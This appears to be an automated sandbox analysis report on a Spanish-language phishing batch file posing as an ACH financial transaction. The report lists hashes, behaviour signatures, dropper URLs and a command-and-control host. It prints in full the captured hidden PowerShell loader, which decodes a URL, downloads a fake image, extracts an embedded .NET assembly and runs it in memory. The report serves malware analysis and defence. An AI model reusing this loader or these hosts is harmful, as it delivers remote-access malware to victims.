Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    29/10/2024, 22:23

General

  • Target

    OPERACIÓN DE TRANSACCIÓN FINANCIERA ACH.bat

  • Size

    210KB

  • MD5

    fc162f6d374e3bce9c3130fdcb6b7307

  • SHA1

    a874953f738df2b9c59d52d1262aac387bf26fb7

  • SHA256

    c7b24736650ed6130939821101f4641e1a50a2316f3bbcf974d85c8de585a40d

  • SHA512

    520bf9202494786604d194bf6b23020231810744bbb405c1177ab7ee30c82633027445c3bb4e464cc690e7d7d0b6daaecd0a5884aeebcd585541d746cdf662e8

  • SSDEEP

    6144:vZnip76K90FB+Z7VIuArKAgY2aaOOiuauK+yp8:E

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://github.com/CryptersAndTools/Upload/blob/main/new_image.jpg?raw=true

exe.dropper

https://github.com/CryptersAndTools/Upload/blob/main/new_image.jpg?raw=true

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops startup file 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\OPERACIÓN DE TRANSACCIÓN FINANCIERA ACH.bat"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:3004
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cHM6Ly9naXRodWIuY29tL0NyeXB0ZXJzQW5kVG9vbHMvVXBsb2FkL2Jsb2IvbWFpbi9uZXdfaW1hZ2UuanBnP3Jhdz10cnVl'; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('joseamayaaa.chickenkiller.com', '1996');"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2680

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/2680-6-0x000007FEF5B0E000-0x000007FEF5B0F000-memory.dmp

          Filesize

          4KB

        • memory/2680-7-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

          Filesize

          2.9MB

        • memory/2680-8-0x0000000002890000-0x0000000002898000-memory.dmp

          Filesize

          32KB

        • memory/2680-9-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

          Filesize

          9.6MB

        • memory/2680-10-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

          Filesize

          9.6MB

        • memory/2680-11-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

          Filesize

          9.6MB